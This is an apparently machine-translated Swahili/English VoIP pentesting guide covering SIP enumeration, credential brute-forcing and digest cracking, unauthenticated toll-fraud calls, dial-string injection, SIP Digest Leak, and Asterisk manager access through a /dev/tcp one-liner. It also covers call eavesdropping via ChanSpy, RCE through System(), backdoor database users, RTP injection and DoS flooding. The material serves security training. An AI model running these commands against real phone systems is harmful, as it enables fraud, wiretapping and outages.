Pentesting VoIP

Reading time: 25 minutes

VoIP Taarifa za Msingi

Ili kuanza kujifunza jinsi VoIP inavyofanya kazi angalia:

{{#ref}} basic-voip-protocols/ {{#endref}}

Meseji za Msingi

Request name	Description								RFC references
------------------------------------------------------------------------------------------------------
REGISTER	Register a SIP user.							RFC 3261
INVITE		Initiate a dialog for establishing a call. 				RFC 3261
ACK		Confirm that an entity has received.					RFC 3261
BYE		Signal termination of a dialog and end a call.				RFC 3261
CANCEL		Cancel any pending request.						RFC 3261
UPDATE		Modify the state of a session without changing the state of the dialog.	RFC 3311
REFER		Ask recipient to issue a request for the purpose of call transfer.	RFC 3515
PRACK		Provisional acknowledgement.						RFC 3262
SUBSCRIBE	Initiates a subscription for notification of events from a notifier.	RFC 6665
NOTIFY		Inform a subscriber of notifications of a new event.			RFC 6665
PUBLISH		Publish an event to a notification server.				RFC 3903
MESSAGE		Deliver a text message.	Used in instant messaging applications.		RFC 3428
INFO		Send mid-session information that does not modify the session state.	RFC 6086
OPTIONS		Query the capabilities of an endpoint					RFC 3261

Response Codes

1xx—Majibu ya Muda

100 Trying
180 Ringing
181 Call is Being Forwarded
182 Queued
183 Session Progress
199 Early Dialog Terminated

2xx—Majibu Mafanikio

200 OK
202 Accepted
204 No Notification

3xx—Majibu ya Uelekezaji

300 Multiple Choices
301 Moved Permanently
302 Moved Temporarily
305 Use Proxy
380 Alternative Service

4xx—Majibu ya Kushindwa kwa Mteja

400 Bad Request
401 Unauthorized
402 Payment Required
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Timeout
409 Conflict
410 Gone
411 Length Required
412 Conditional Request Failed
413 Request Entity Too Large
414 Request-URI Too Long
415 Unsupported Media Type
416 Unsupported URI Scheme
417 Unknown Resource-Priority
420 Bad Extension
421 Extension Required
422 Session Interval Too Small
423 Interval Too Brief
424 Bad Location Information
425 Bad Alert Message
428 Use Identity Header
429 Provide Referrer Identity
430 Flow Failed
433 Anonymity Disallowed
436 Bad Identity-Info
437 Unsupported Certificate
438 Invalid Identity Header
439 First Hop Lacks Outbound Support
440 Max-Breadth Exceeded
469 Bad Info Package
470 Consent Needed
480 Temporarily Unavailable
481 Call/Transaction Does Not Exist
482 Loop Detected
483 Too Many Hops
484 Address Incomplete
485 Ambiguous
486 Busy Here
487 Request Terminated
488 Not Acceptable Here
489 Bad Event
491 Request Pending
493 Undecipherable
494 Security Agreement Required

5xx—Majibu ya Kushindwa kwa Server

500 Internal Server Error
501 Not Implemented
502 Bad Gateway
503 Service Unavailable
504 Server Time-out
505 Version Not Supported
513 Message Too Large
555 Push Notification Service Not Supported
580 Precondition Failure

6xx—Majibu ya Kushindwa kwa Kimataifa

600 Busy Everywhere
603 Decline
604 Does Not Exist Anywhere
606 Not Acceptable
607 Unwanted
608 Rejected

VoIP Enumeration

Telephone Numbers

Moja ya hatua za kwanza ambazo Timu Nyekundu inaweza kufanya ni kutafuta nambari za simu zinazopatikana kuwasiliana na kampuni kwa kutumia zana za OSINT, Utafutaji wa Google au kuchambua kurasa za wavuti.

Mara tu unapokuwa na nambari za simu unaweza kutumia huduma za mtandaoni kubaini operator:

• https://www.numberingplans.com/?page=analysis&sub=phonenr
• https://mobilenumbertracker.com/
• https://www.whitepages.com/
• https://www.twilio.com/lookup

Kujua kama operator anatoa huduma za VoIP unaweza kubaini kama kampuni inatumia VoIP... Aidha, inawezekana kwamba kampuni haijakodisha huduma za VoIP lakini inatumia kadi za PSTN kuunganisha PBX yake ya VoIP na mtandao wa simu za jadi.

Mambo kama majibu ya kiotomatiki ya muziki mara nyingi yanaashiria kwamba VoIP inatumika.

Google Dorks

# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org

# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"

# Cisco phones
inurl:"NetworkConfiguration" cisco

# Linksys phones
intitle:"Sipura SPA Configuration"

# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm

# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com

# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"

# FreePBX
inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"

OSINT information

Taarifa nyingine yoyote ya OSINT inayosaidia kubaini programu za VoIP zinazotumika itakuwa na msaada kwa Timu Nyekundu.

Network Enumeration

• nmap ina uwezo wa kuskan huduma za UDP, lakini kwa sababu ya idadi ya huduma za UDP zinazoskaniwa, ni polepole sana na huenda isiwe sahihi sana na aina hii ya huduma.

sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24

• svmap kutoka SIPVicious (sudo apt install sipvicious): Itagundua huduma za SIP katika mtandao ulioonyeshwa.
• svmap ni rahisi kuzuia kwa sababu inatumia User-Agent friendly-scanner, lakini unaweza kubadilisha msimbo kutoka /usr/share/sipvicious/sipvicious na kuubadilisha.

# Use --fp to fingerprint the services
svmap 10.10.0.0/24 -p 5060-5070 [--fp]

• SIPPTS scan from sippts: SIPPTS scan ni skana ya haraka sana kwa huduma za SIP kupitia UDP, TCP au TLS. Inatumia multithread na inaweza skana maeneo makubwa ya mitandao. Inaruhusu kuonyesha kwa urahisi anuwai ya bandari, skana TCP na UDP, tumia njia nyingine (kwa default itatumia OPTIONS) na kubaini User-Agent tofauti (na zaidi).

sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]

[!] IP/Network: 10.10.0.0/24
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
[!] Customized User-Agent: Cisco
[!] Used threads: 200

• metasploit:

auxiliary/scanner/sip/options_tcp normal  No     SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options     normal  No     SIP Endpoint Scanner (UDP)

Extra Network Enumeration

PBX inaweza pia kuwa inatoa huduma zingine za mtandao kama vile:

• 69/UDP (TFTP): Sasisho za firmware
• 80 (HTTP) / 443 (HTTPS): Kusimamia kifaa kutoka mtandaoni
• 389 (LDAP): Mbadala wa kuhifadhi taarifa za watumiaji
• 3306 (MySQL): Hifadhidata ya MySQL
• 5038 (Manager): Inaruhusu kutumia Asterisk kutoka majukwaa mengine
• 5222 (XMPP): Ujumbe ukitumia Jabber
• Na zingine...

Methods Enumeration

Inawezekana kupata ni mbinu zipi zinapatikana kutumia katika PBX kwa kutumia SIPPTS enumerate kutoka sippts

sippts enumerate -i 10.10.0.10

Kuchambua majibu ya seva

Ni muhimu sana kuchambua vichwa ambavyo seva inatuletea, kulingana na aina ya ujumbe na vichwa tunavyotuma. Kwa kutumia SIPPTS send kutoka sippts tunaweza kutuma ujumbe wa kibinafsi, tukibadilisha vichwa vyote, na kuchambua jibu.

sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp

Inawezekana pia kupata data ikiwa seva inatumia websockets. Kwa SIPPTS wssend kutoka sippts tunaweza kutuma ujumbe wa WS wa kibinafsi.

sippts wssend -i 10.10.0.10 -r 443 -path /ws

Extension Enumeration

Extensions katika mfumo wa PBX (Private Branch Exchange) zinarejelea vitambulisho vya ndani vya kipekee vilivyotolewa kwa simu za ndani, vifaa, au watumiaji ndani ya shirika au biashara. Extensions zinawezesha kuelekeza simu ndani ya shirika kwa ufanisi, bila haja ya nambari za simu za nje kwa kila mtumiaji au kifaa.

• svwar kutoka SIPVicious (sudo apt install sipvicious): svwar ni skana ya laini ya PBX ya SIP isiyo na malipo. Katika dhana inafanya kazi kwa njia inayofanana na wardialers wa jadi kwa kukisia anuwai ya extensions au orodha maalum ya extensions.

svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER

• SIPPTS exten from sippts: SIPPTS exten inatambua nyongeza kwenye seva ya SIP. Sipexten inaweza kuangalia mtandao mkubwa na anuwai za bandari.

sippts exten -i 10.10.0.10 -r 5060 -e 100-200

• metasploit: Unaweza pia kuhesabu nyongeza/jina za watumiaji kwa kutumia metasploit:

auxiliary/scanner/sip/enumerator_tcp  normal  No     SIP Username Enumerator (TCP)
auxiliary/scanner/sip/enumerator      normal  No     SIP Username Enumerator (UDP)

• enumiax (apt install enumiax): enumIAX ni mchakato wa Inter Asterisk Exchange wa kuhesabu majina ya watumiaji kwa nguvu. enumIAX inaweza kufanya kazi katika njia mbili tofauti; Kukisia Majina ya Watumiaji kwa Mfululizo au Shambulio la Kamusi.

enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary
enumiax -v -m3 -M3 10.10.0.10

VoIP Attacks

Password Brute-Force - online

Baada ya kugundua PBX na baadhi ya extensions/usernames, Timu Nyekundu inaweza kujaribu kujiandikisha kupitia njia ya REGISTER kwa extension ikitumia kamusi ya nywila za kawaida ili kufaulu kuingia.

• svcrack kutoka SIPVicious (sudo apt install sipvicious): SVCrack inakuwezesha kufungua nywila ya jina la mtumiaji/extension maalum kwenye PBX.

svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions

• SIPPTS rcrack from sippts: SIPPTS rcrack ni mchoraji wa nywila wa mbali kwa huduma za SIP. Rcrack inaweza kujaribu nywila za watumiaji kadhaa katika anwani tofauti za IP na anuwai za bandari.

sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt

• Metasploit:
• https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb
• https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb

VoIP Sniffing

Ikiwa unapata vifaa vya VoIP ndani ya Open Wifi network, unaweza kunasa taarifa zote. Zaidi ya hayo, ikiwa uko ndani ya mtandao uliofungwa zaidi (uliounganishwa kupitia Ethernet au Wifi iliyo na ulinzi) unaweza kufanya MitM attacks kama ARPspoofing kati ya PBX na gateway ili kunasa taarifa.

Kati ya taarifa za mtandao, unaweza kupata web credentials za kusimamia vifaa, extensions za watumiaji, jina la mtumiaji, anwani za IP, hata hashed passwords na RTP packets ambazo unaweza kuzirejesha ili kusikia mazungumzo, na zaidi.

Ili kupata taarifa hizi unaweza kutumia zana kama Wireshark, tcpdump... lakini zana iliyoundwa mahsusi kunasa mazungumzo ya VoIP ni ucsniff.

SIP credentials (Password Brute-Force - offline)

Angalia mfano huu ili kuelewa vyema SIP REGISTER communication ili kujifunza jinsi credentials zinavyotumwa.

• sipdump & sipcrack, sehemu ya sipcrack (apt-get install sipcrack): Zana hizi zinaweza kutoa kutoka kwa pcap digest authentications ndani ya protokali ya SIP na bruteforce hizo.

sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt

• SIPPTS dump from sippts: SIPPTS dump inaweza kutoa uthibitisho wa digest kutoka kwa faili ya pcap.

sippts dump -f capture.pcap -o data.txt

• SIPPTS dcrack from sippts: SIPPTS dcrack ni chombo cha kuvunja uthibitisho wa muhtasari uliopatikana na SIPPTS dump.

sippts dcrack -f data.txt -w wordlist/rockyou.txt

• SIPPTS tshark from sippts: SIPPTS tshark inatoa data ya protokali ya SIP kutoka faili ya PCAP.

sippts tshark -f capture.pcap [-filter auth]

DTMF codes

Sio tu akreditif za SIP zinaweza kupatikana katika trafiki ya mtandao, pia inawezekana kupata nambari za DTMF ambazo zinatumika kwa mfano kufikia voicemail.
Inawezekana kutuma nambari hizi katika INFO SIP messages, katika sauti au ndani ya RTP packets. Ikiwa nambari ziko ndani ya RTP packets, unaweza kukata sehemu hiyo ya mazungumzo na kutumia zana multimo kuzitoa:

multimon -a DTMF -t wac pin.wav

Free Calls / Asterisks Connections Misconfigurations

Katika Asterisk inawezekana kuruhusu muunganisho kutoka anwani maalum ya IP au kutoka anwani yoyote ya IP:

host=10.10.10.10
host=dynamic

Ikiwa anwani ya IP imeainishwa, mwenyeji hatahitaji kutuma maombi ya REGISTER kila wakati (katika pakiti ya REGISTER inatumwa muda wa kuishi, kawaida ni dakika 30, ambayo inamaanisha kwamba katika hali nyingine simu itahitaji REGISTER kila dakika 30). Hata hivyo, itahitaji kuwa na bandari wazi zinazoruhusu muunganisho kutoka kwa seva ya VoIP ili kupokea simu.

Ili kufafanua watumiaji wanaweza kufafanuliwa kama:

• type=user: Mtumiaji anaweza kupokea simu tu kama mtumiaji.
• type=friend: Inawezekana kufanya simu kama rika na kuzipokea kama mtumiaji (inatumika na nyongeza)
• type=peer: Inawezekana kutuma na kupokea simu kama rika (SIP-trunks)

Pia inawezekana kuanzisha uaminifu na kigezo kisichokuwa salama:

• insecure=port: Inaruhusu muunganisho wa rika ulioidhinishwa na IP.
• insecure=invite: Haihitaji uthibitisho kwa ujumbe wa INVITE
• insecure=port,invite: Zote mbili

Simu za Bure / Makosa ya Muktadha wa Asterisks

Katika Asterisk, muktadha ni chombo au sehemu yenye jina katika mpango wa kupiga simu ambayo inaunganisha nyongeza, hatua, na sheria zinazohusiana. Mpango wa kupiga simu ni kipengele cha msingi cha mfumo wa Asterisk, kwani unafafanua jinsi simu zinazokuja na zinazotoka zinavyoshughulikiwa na kuelekezwa. Muktadha hutumiwa kuandaa mpango wa kupiga simu, kudhibiti ufikiaji, na kutoa utenganisho kati ya sehemu tofauti za mfumo.

Kila muktadha umeainishwa katika faili ya usanidi, kawaida katika faili ya extensions.conf. Muktadha huonyeshwa kwa mabano ya mraba, huku jina la muktadha likiwa ndani yao. Kwa mfano:

csharpCopy code[my_context]

Ndani ya muktadha, unafafanua nyongeza (mifumo ya nambari zinazopigiwa) na kuziunganisha na mfululizo wa vitendo au programu. Vitendo hivi vinamua jinsi simu inavyoshughulikiwa. Kwa mfano:

[my_context]
exten => 100,1,Answer()
exten => 100,n,Playback(welcome)
exten => 100,n,Hangup()

Hii mfano inaonyesha muktadha rahisi unaoitwa "my_context" na nyongeza "100". Wakati mtu anapopiga 100, simu itajibiwa, ujumbe wa kukaribisha utachezwa, na kisha simu itakatishwa.

Huu ni muktadha mwingine unaoruhusu kupiga nambari nyingine yoyote:

[external]
exten => _X.,1,Dial(SIP/trunk/${EXTEN})

Ikiwa msimamizi anafafanua muktadha wa kawaida kama:

[default]
include => my_context
include => external

• SIPPTS invite kutoka sippts: SIPPTS invite inakagua kama server ya PBX inaturuhusu kufanya simu bila uthibitisho. Ikiwa server ya SIP ina usanidi usio sahihi, itaturuhusu kufanya simu kwa nambari za nje. Pia inaweza kuturuhusu kuhamasisha simu kwa nambari ya pili ya nje.

Kwa mfano, ikiwa server yako ya Asterisk ina usanidi mbaya wa muktadha, unaweza kukubali ombi la INVITE bila idhini. Katika kesi hii, mshambuliaji anaweza kufanya simu bila kujua mtumiaji/nywila yoyote.

# Trying to make a call to the number 555555555 (without auth) with source number 200.
sippts invite -i  10.10.0.10 -fu 200 -tu 555555555 -v

# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444

Free calls / Misconfigured IVRS

IVRS inamaanisha Interactive Voice Response System, teknolojia ya simu inayowezesha watumiaji kuingiliana na mfumo wa kompyuta kupitia sauti au ingizo la tone. IVRS inatumika kujenga automated call handling mifumo inayotoa anuwai ya kazi, kama vile kutoa taarifa, kuelekeza simu, na kukamata ingizo la mtumiaji.

IVRS katika mifumo ya VoIP kwa kawaida inajumuisha:

1. Voice prompts: Ujumbe wa sauti ulioandikwa awali unaoongoza watumiaji kupitia chaguo za menyu za IVR na maelekezo.
2. DTMF (Dual-Tone Multi-Frequency) signaling: Ingizo la tone linalozalishwa kwa kubonyeza funguo kwenye simu, ambalo linatumika kuhamasisha kupitia menyu za IVR na kutoa ingizo.
3. Call routing: Kuelekeza simu kwa mahali sahihi, kama vile idara maalum, mawakala, au nyongeza kulingana na ingizo la mtumiaji.
4. User input capture: Kukusanya taarifa kutoka kwa wapiga simu, kama vile nambari za akaunti, vitambulisho vya kesi, au data nyingine yoyote muhimu.
5. Integration with external systems: Kuunganisha mfumo wa IVR na hifadhidata au mifumo mingine ya programu ili kufikia au kusasisha taarifa, kutekeleza vitendo, au kuanzisha matukio.

Katika mfumo wa Asterisk VoIP, unaweza kuunda IVR kwa kutumia mpango wa kupiga (extensions.conf file) na programu mbalimbali kama Background(), Playback(), Read(), na zaidi. Programu hizi zinakusaidia kucheza sauti za maelekezo, kukamata ingizo la mtumiaji, na kudhibiti mtiririko wa simu.

Example of vulnerable configuration

exten => 0,100,Read(numbers,the_call,,,,5)
exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
exten => 0,103,GotoIf("$[${numbers}"=""]?100)
exten => 0,104,Dial(LOCAL/${numbers})

Kielelezo kilichopita ni mfano ambapo mtumiaji anaombwa kubonyeza 1 ili kupiga idara, 2 ili kupiga nyingine, au nambari kamili ikiwa anajua.
Uthibitisho wa udhaifu ni ukweli kwamba urefu wa nambari haujakaguliwa, hivyo mtumiaji anaweza kuingiza muda wa sekunde 5 nambari kamili na itapigwa.

Uingizaji wa Nambari

Kutumia nambari kama:

exten => _X.,1,Dial(SIP/${EXTEN})

Ambapo ${EXTEN} ni kiendelezi ambacho kitaitwa, wakati ext 101 inapoanzishwa hii ndiyo itakayojitokeza:

exten => 101,1,Dial(SIP/101)

Hata hivyo, ikiwa ${EXTEN} inaruhusu kuingiza zaidi ya nambari (kama katika toleo za zamani za Asterisk), mshambuliaji anaweza kuingiza 101&SIP123123123 ili kupiga nambari ya simu 123123123. Na hii itakuwa matokeo:

exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)

Hivyo, simu kwa kiendelezi 101 na 123123123 itatumwa na ni kiendelezi cha kwanza pekee kitakachopokea simu... lakini ikiwa mshambuliaji atatumia kiendelezi kinachopitisha mechi yoyote inayofanywa lakini hakipo, anaweza kuingiza simu tu kwa nambari inayotakiwa.

Uthibitisho wa SIPDigestLeak

SIP Digest Leak ni udhaifu unaoathiri idadi kubwa ya Simu za SIP, ikiwa ni pamoja na simu za IP za vifaa na programu pamoja na adapta za simu (VoIP hadi analojia). Udhaifu huu unaruhusu kuvuja kwa jibu la uthibitisho wa Digest, ambalo linahesabiwa kutoka kwa nenosiri. Shambulio la nenosiri la mbali linaweza kufanyika na linaweza kurejesha nenosiri nyingi kulingana na jibu la changamoto.

**Muktadha wa udhaifu kutoka hapa**:

1. Simu ya IP (mohaka) inasikiliza kwenye bandari yoyote (kwa mfano: 5060), ikikubali simu
2. Mshambuliaji anatumia INVITE kwa Simu ya IP
3. Simu ya mohaka inaanza kupiga kelele na mtu anachukua na kutundika (kwa sababu hakuna anayejibu simu upande wa pili)
4. Wakati simu inatundikwa, simu ya mohaka inatuma BYE kwa mshambuliaji
5. Mshambuliaji anatoa jibu la 407 ambalo linahitaji uthibitisho na kutoa changamoto ya uthibitisho
6. Simu ya mohaka inatoa jibu kwa changamoto ya uthibitisho katika BYE ya pili
7. Mshambuliaji anaweza kisha kutoa shambulio la brute-force kwenye jibu la changamoto kwenye mashine yake ya ndani (au mtandao ulio sambamba n.k.) na kukisia nenosiri

• SIPPTS leak kutoka sippts: SIPPTS leak inatumia udhaifu wa SIP Digest Leak unaoathiri idadi kubwa ya Simu za SIP. Matokeo yanaweza kuhifadhiwa katika muundo wa SipCrack ili kujaribu nguvu kutumia SIPPTS dcrack au zana ya SipCrack.

sippts leak -i 10.10.0.10

[!] Target: 10.10.0.10:5060/UDP
[!] Caller: 100
[!] Callee: 100

[=>] Request INVITE
[<=] Response 100 Trying
[<=] Response 180 Ringing
[<=] Response 200 OK
[=>] Request ACK
... waiting for BYE ...
[<=] Received BYE
[=>] Request 407 Proxy Authentication Required
[<=] Received BYE with digest
[=>] Request 200 Ok

Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5

Click2Call

Click2Call inaruhusu mtumiaji wa wavuti (ambaye kwa mfano anaweza kuwa na hamu na bidhaa) kuwasilisha nambari yake ya simu ili apigiwe simu. Kisha biashara itapigiwa simu, na wakati atakap chukua simu mtumiaji atakuwa apigiwa simu na kuunganishwa na wakala.

Profaili ya kawaida ya Asterisk kwa hili ni:

[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
allow = 0.0.0.0/0.0.0.0
displayconnects = yes
read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
write = system,call,agent,user,config,command,reporting,originate

• Profaili ya awali inaruhusu ANAYE IP yoyote kuungana (ikiwa nenosiri linajulikana).
• Ili kuandaa simu, kama ilivyobainishwa hapo awali, hakuna ruhusa za kusoma zinazohitajika na tu kuanzisha katika kuandika inahitajika.

Kwa ruhusa hizo, IP yoyote inayojua nenosiri inaweza kuungana na kutoa taarifa nyingi, kama:

# Get all the peers
exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3

Maelezo zaidi au hatua zinaweza kuombwa.

Kusikiliza kwa siri

Katika Asterisk inawezekana kutumia amri ChanSpy kuashiria kiunganishi (s) cha kufuatilia (au vyote) kusikia mazungumzo yanayoendelea. Amri hii inahitaji kupewa kiunganishi.

Kwa mfano, exten => 333,1,ChanSpy('all',qb) inaonyesha kwamba ikiwa unapiga kiunganishi 333, itakuwa inatazama vyote viunganishi, kuanza kusikiliza kila wakati mazungumzo mapya yanapoanza (b) katika hali ya kimya (q) kwani hatutaki kuingilia kati. Unaweza kuhamia kutoka mazungumzo moja hadi nyingine kwa kubonyeza *, au kuandika nambari ya kiunganishi.

Pia inawezekana kutumia ExtenSpy kufuatilia kiunganishi kimoja tu.

Badala ya kusikiliza mazungumzo, inawezekana kuyarekodi katika faili kwa kutumia kiunganishi kama:

[recorded-context]
exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
exten => _X.,2,MixMonitor(${NAME})

Calls will be saved in /tmp.

You could also even make Asterisk kufanya script ambayo itavuja simu when it's closed.

exten => h,1,System(/tmp/leak_conv.sh &)

RTCPBleed vulnerability

RTCPBleed ni tatizo kubwa la usalama linaloathiri seva za VoIP za msingi wa Asterisk (zilizochapishwa mwaka 2017). Uthibitisho huu unaruhusu RTP (Real Time Protocol) traffic, inayobeba mazungumzo ya VoIP, kukamatwa na kuelekezwa na mtu yeyote kwenye Mtandao. Hii inatokea kwa sababu trafiki ya RTP inapita uthibitisho inapopita kupitia moto wa NAT (Network Address Translation).

RTP proxies hujaribu kushughulikia mipaka ya NAT inayohusiana na mifumo ya RTC kwa kuproxy RTP streams kati ya wahusika wawili au zaidi. Wakati NAT ipo, programu ya RTP proxy mara nyingi haiwezi kutegemea taarifa za IP na bandari za RTP zilizopatikana kupitia ishara (e.g. SIP). Kwa hivyo, idadi ya RTP proxies zimeanzisha mekanizma ambapo IP na port tuplet inajifunza kiotomatiki. Hii mara nyingi hufanywa kwa kukagua trafiki ya RTP inayokuja na kuweka alama IP na bandari ya chanzo kwa trafiki yoyote ya RTP inayokuja kama ile ambayo inapaswa kujibiwa. Mekanizma hii, ambayo inaweza kuitwa "learning mode", haitumii aina yoyote ya uthibitisho. Kwa hivyo washambuliaji wanaweza kutuma trafiki ya RTP kwa RTP proxy na kupokea trafiki ya RTP iliyoprosiwa ambayo inapaswa kuwa kwa mpiga simu au mpokeaji wa mtiririko wa RTP unaoendelea. Tunaita udhaifu huu RTP Bleed kwa sababu unaruhusu washambuliaji kupokea mitiririko ya media ya RTP ambayo inapaswa kutumwa kwa watumiaji halali.

Tabia nyingine ya kuvutia ya RTP proxies na RTP stacks ni kwamba wakati mwingine, hata kama si hatarishi kwa RTP Bleed, watakubali, kupeleka na/au kushughulikia pakiti za RTP kutoka chanzo chochote. Kwa hivyo washambuliaji wanaweza kutuma pakiti za RTP ambazo zinaweza kuwapa uwezo wa kuingiza media yao badala ya ile halali. Tunaita shambulio hili RTP injection kwa sababu inaruhusu kuingizwa kwa pakiti za RTP zisizo halali katika mitiririko ya RTP iliyopo. Uthibitisho huu unaweza kupatikana katika RTP proxies na mwisho.

Asterisk na FreePBX kwa kawaida wamekuwa wakitumia NAT=yes setting, ambayo inaruhusu trafiki ya RTP kupita uthibitisho, ambayo inaweza kusababisha kutokuwa na sauti au sauti ya upande mmoja kwenye simu.

Kwa maelezo zaidi angalia https://www.rtpbleed.com/

• SIPPTS rtpbleed kutoka sippts: SIPPTS rtpbleed inagundua udhaifu wa RTP Bleed kwa kutuma RTP streams.

sippts rtpbleed -i 10.10.0.10

• SIPPTS rtcpbleed from sippts: SIPPTS rtcpbleed inagundua udhaifu wa RTP Bleed kwa kutuma RTCP streams.

sippts rtcpbleed -i 10.10.0.10

• SIPPTS rtpbleedflood from sippts: SIPPTS rtpbleedflood inatumia udhaifu wa RTP Bleed kutuma RTP streams.

sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v

• SIPPTS rtpbleedinject from sippts: SIPPTS rtpbleedinject inatumia udhaifu wa RTP Bleed kuingiza faili la sauti (format ya WAV).

sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav

RCE

Katika Asterisk unaweza kwa namna fulani kuweza kuongeza sheria za nyongeza na kuzipakia upya (kwa mfano kwa kuathiri seva ya meneja wa wavuti iliyo hatarini), inawezekana kupata RCE kwa kutumia amri ya System.

same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)

There is command called Shell that could be used instead of System to execute system commands if necessary.

Interesting local files and permissions

• sip.conf -> Inayo nenosiri la watumiaji wa SIP.
• If the Asterisk server is running as root, you could compromise root
• mysql root user might doesn't have any password.
• this could be used to create a new mysql user as backdoor
• FreePBX
• amportal.conf -> Inayo nenosiri la msimamizi wa paneli ya wavuti (FreePBX)
• FreePBX.conf -> Inayo nenosiri la mtumiaji FreePBXuser anayetumia kufikia hifadhidata
• this could be used to create a new mysql user as backdoor
• Elastix
• Elastix.conf -> Inayo nenosiri kadhaa kwa maandiko wazi kama nenosiri la mysql root, nenosiri la IMAPd, nenosiri la msimamizi wa wavuti
• Makaratasi kadhaa yatakuwa chini ya mtumiaji aliyeathiriwa wa asterisk (ikiwa haifanyi kazi kama root). Mtumiaji huyu anaweza kusoma faili za awali na pia anadhibiti usanidi, hivyo anaweza kufanya Asterisk kupakia binaries nyingine zenye backdoor wakati inatekelezwa.

RTP Injection

It's possible to insert a .wav in converstions using tools such as rtpinsertsound (sudo apt install rtpinsertsound) and rtpmixsound (sudo apt install rtpmixsound).

Or you could use the scripts from http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/ to scan conversations (rtpscan.pl), send a .wav to a conversation (rtpsend.pl) and insert noise in a conversation (rtpflood.pl).

DoS

There are several ways to try to achieve DoS in VoIP servers.

• SIPPTS flood from sippts**: SIPPTS flood sends unlimited messages to the target.
• sippts flood -i 10.10.0.10 -m invite -v
• SIPPTS ping from sippts**: SIPPTS ping makes a SIP ping to see the server response time.
• sippts ping -i 10.10.0.10
• IAXFlooder: DoS IAX protocol used by Asterisk
• inviteflood: A tool to perform SIP/SDP INVITE message flooding over UDP/IP.
• rtpflood: Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first).
• SIPp: Allows to analyze and generate SIP traffic. so it can be used to DoS also.
• SIPsak: SIP swiss army knife. Can also be used to perform SIP attacks.
• Fuzzers: protos-sip, voiper.

OS Vulnerabilities

The easiest way to install a software such as Asterisk is to download an OS distribution that has it already installed, such as: FreePBX, Elastix, Trixbox... The problem with those is that once it's working sysadmins might not update them again and vulnerabilities are going to be discovered with time.

References

• https://github.com/Pepelux/sippts/wiki
• https://github.com/EnableSecurity/sipvicious
• http://blog.pepelux.org/
• https://www.rtpbleed.com/
• https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4
• https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf